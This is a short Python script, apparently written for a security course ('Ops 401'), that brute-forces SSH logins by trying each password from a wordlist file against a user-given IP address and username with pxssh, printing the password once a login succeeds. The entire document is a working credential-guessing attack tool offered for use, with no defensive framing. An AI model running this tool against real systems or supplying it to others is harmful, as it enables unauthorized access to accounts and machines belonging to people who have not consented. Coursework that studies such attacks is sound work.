#!/usr/bin/env python3
##  /\__/\
#  (=^ .^=)
#   (")(")__/  
##
# Script:                 Ops 401 17
# Author:                 Kimberly Dills
# Date of last revision:  10/27/2020
# Description of purpose: Automated Brute Force Wordlist Attack Tool 2 of 3

import smtplib
import itertools
import sys
import time
from pexpect import pxssh

def split(user, ipAddress, txtFile ):
    filepath =open(txtFile)
    for i in filepath.readlines():
        secret=i.strip("\n")
        print(secret)
        s=pxssh.pxssh()
        try:
            s.login(ipAddress, user, secret)
            print("The password is  "+ secret)
            break    
        except pxssh.ExceptionPxssh as e:
            print ("pxssh failed to login")
            print(e)
            time.sleep(1)       
def main():
    print("Please enter a Mode")
    user=input("What is the username for the SSH connection?")
    ipAddress=input("What is the ip address of the target system?")
    txtFile=input("What is the folder path to your dictionary file?")
    split(user, ipAddress, txtFile)  
main()
